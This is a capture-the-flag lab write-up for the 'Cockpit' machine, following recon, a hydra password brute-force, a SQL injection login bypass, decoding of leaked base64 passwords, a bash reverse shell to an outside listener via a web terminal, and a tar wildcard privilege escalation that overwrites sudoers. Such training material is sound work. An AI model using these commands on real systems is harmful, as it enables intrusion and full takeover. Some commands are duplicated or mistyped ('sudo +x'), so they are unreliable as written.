Cockpit

Target IP: 192.168.229.10
Challenge Description: Go out in a blaze of glory.


Reconnaissance

48afbc76131df8964365cf25efbeb59d.png
Performing a TCP port scan shows there are three TCP ports open: SSH, HTTP, and another HTTP on port 9090, as shown above.

┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Cockpit]
└─$ sudo nmap -sV -A 192.168.229.10 -p 22,80,9090
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-18 20:22 UTC
Nmap scan report for 192.168.229.10
Host is up (0.014s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp   open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: blaze
9090/tcp open  ssl/zeus-admin?
| ssl-cert: Subject: commonName=blaze/organizationName=d2737565435f491e97f49bb5b34ba02e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2024-01-18T20:22:59
|_Not valid after:  2123-12-25T20:22:59
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|     margin: 0 0 10px;
|_    @font-face {
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.94%T=SSL%I=7%D=1/18%Time=65A988E3%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E45,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010px;\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20@font-face\x20{\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20")%r(HTTPOptions,E45,"HTTP/1\.1\x20400\x20Bad
SF:\x20request\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-
SF:Encoding:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Poli
SF:cy:\x20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\n\r\n29\r\n<
SF:!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\
SF:x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Co
SF:ntent-Type\"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20\x20\
SF:x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initi
SF:al-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDisplay\",\x20\"Open\x
SF:20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20line-height:\x201\.66666667;\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20background-color:\x20#f5f5f5;\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\x200;\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\x20middle;\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-weight:\x20300;\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200\x200\x2010
SF:px;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0@font-face\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (87%), Linux 5.0 - 5.4 (87%), Linux 2.6.32 (87%), Linux 2.6.32 or 3.10 (87%), Linux 3.5 (87%), Linux 4.2 (87%), Linux 4.8 (86%), Synology DiskStation Manager 5.1 (86%), Linux 2.6.18 (86%), Linux 2.6.35 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   11.29 ms 192.168.45.1
2   11.36 ms 192.168.45.254
3   11.50 ms 192.168.251.1
4   11.79 ms 192.168.229.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.73 seconds
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Cockpit]
└─$ sudo nmap -sV -A 192.168.229.10 -p 22,80,9090
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-18 20:22 UTC
Nmap scan report for 192.168.229.10
Host is up (0.014s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp   open  http            Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: blaze
9090/tcp open  ssl/zeus-admin?
| ssl-cert: Subject: commonName=blaze/organizationName=d2737565435f491e97f49bb5b34ba02e
| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost
| Not valid before: 2024-01-18T20:22:59
|_Not valid after:  2123-12-25T20:22:59
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|     margin: 0 0 10px;
|_    @font-face {
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.94%T=SSL%I=7%D=1/18%Time=65A988E3%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E45,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010px;\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20@font-face\x20{\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20")%r(HTTPOptions,E45,"HTTP/1\.1\x20400\x20Bad
SF:\x20request\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-
SF:Encoding:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Poli
SF:cy:\x20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\n\r\n29\r\n<
SF:!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\
SF:x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Co
SF:ntent-Type\"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20\x20\
SF:x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initi
SF:al-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDisplay\",\x20\"Open\x
SF:20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20line-height:\x201\.66666667;\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20background-color:\x20#f5f5f5;\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\x200;\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\x20middle;\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-weight:\x20300;\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200\x200\x2010
SF:px;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0@font-face\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (87%), Linux 5.0 - 5.4 (87%), Linux 2.6.32 (87%), Linux 2.6.32 or 3.10 (87%), Linux 3.5 (87%), Linux 4.2 (87%), Linux 4.8 (86%), Synology DiskStation Manager 5.1 (86%), Linux 2.6.18 (86%), Linux 2.6.35 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   11.29 ms 192.168.45.1
2   11.36 ms 192.168.45.254
3   11.50 ms 192.168.251.1
4   11.79 ms 192.168.229.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.73 seconds

I performed an aggressive port scan against the three TCP ports and received the result above. The HTTP application on port 80 sounds interesting to me. There is also some sort of Ubuntu application on port 8090.


Enumeration

Port 80: HTTP
ec94ce507ea54003c548198333e2941f.png
The webpage above is displayed for the web application above. There are buttons on the webpage; however, they are not interactive. The source-code of the webpage does not contain anything useful either. Time to perform a directory search to identify any hidden files, directories, etc.

b52892eed6a53230c149998b0fe9cb91.png
I identified the login.php webpage, as shown above. I tried default credentials of admin:admin, admin:root, and root:root, but I had no luck.

5ac2ad4dcc67e66e1ed1fa3ec5fac5e3.png
However, using hydra and the command hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.229.10 http-post-form "/login.php:username=admin&password=^PASS^:Invalid password\!", I was able to bruteforce the password sleepy of the user admin as shown above. Now I have the credentials admin:sleepy.

144a9f61be1fece15360370eac083b10.png
Even after using the credentials admin:sleepy, I was unsuccessful as the webpage above was returned to me.


Exploitation

d9e5eaa501f30acc9cad46b517a4ee34.png
I used a semi-colon for username input field and pressed the LOGIN button, and obtained the useful MySQL error message shown above. It seems like the web application is vulnerable to MySQL injection attacks.

f2e49b7a8907e1e36511d817b86b77bb.png
And bingo! Using the payload ' ORDER BY 1-- //, I managed to bypass the login process and received the webpage shown above. There are two usernames here: james and cameron with their password hashes.

63ddb9d0f3fc2be8f4af01c7adf83f08.png
Those passwords hashes are in base64 format. I decoded the first password hash Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI= by using the command echo Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI= | base64 -d and obtained the password canttouchhhthiss@455152. This password belongs to the user james. Then I used the command echo dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy | base64 -d to decode the password hash dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy of user cameron and obtained the password thisscanttbetouchedd@455152. Now I have three sets of credentials. I used these three credentials against the SSH application on port 22, but I had no luck.

Port 9090: HTTP
f67604128f859c45ec87e51b3d93c8a5.png
This web application takes in a username and password. Maybe I can use the set of three credentials here? Two credentials failed. However, when I used the credentials james:canttouchhhthiss@455152 at this web application -- I got a hit!

eace8d195f6c0d911808265fd86c79ee.png
I successfully logged in as the user james as shown above.

af56d39b880684badb0e660737056a3d.png
After some manual enumeration, I identified there is a terminal application. Using this terminal feature, I issued some commands and obtained more information. I can use this to obtain a reverse shell connection.

ea19281bc14ea26fc65ca7d88d632e89.png
I started a listener on my machine at port 8443. Then using the bash reverse shell bash -c "/bin/bash -i >& /dev/tcp/192.168.45.198/8443 0>&1" at the terminal feature, I obtained a reverse shell connection on my machine at port 8443 as shown above. Now I have a foothold on the target machine with the session as the user james.


Privilege Escalation

598d85445138557cc83af012421d3e22.png
Running sudo -l shows the interesting entry above. The entry /usr/bin/tar -czvf /tmp/backup.tar.gz * has wildcard injection vulnerability; therefore, it can be executed with root privileges to gain a root shell.

echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh privesc.sh'
echo "echo 'james ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > privesc.sh
sudo +x privesc.sh
sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *
sudo /bin/bash
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh privesc.sh'
echo "echo 'james ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > privesc.sh
sudo +x privesc.sh
sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *
sudo /bin/bash

Since I can exploit the wildcard vulnerability for the tar binary, I issued the commands above to spawn a root shell on the target machine.

79cd2502ace464661cec0334fababdff.png
And bingo! Now I have a root shell. GG.


Flags

b774ed6c8f1876ffb8dfbd8fd8e163e4.png
The local.txt flag is shown above.

e988da207215f9eeb6934890ed7f20b9.png
The proof.txt flag is shown above.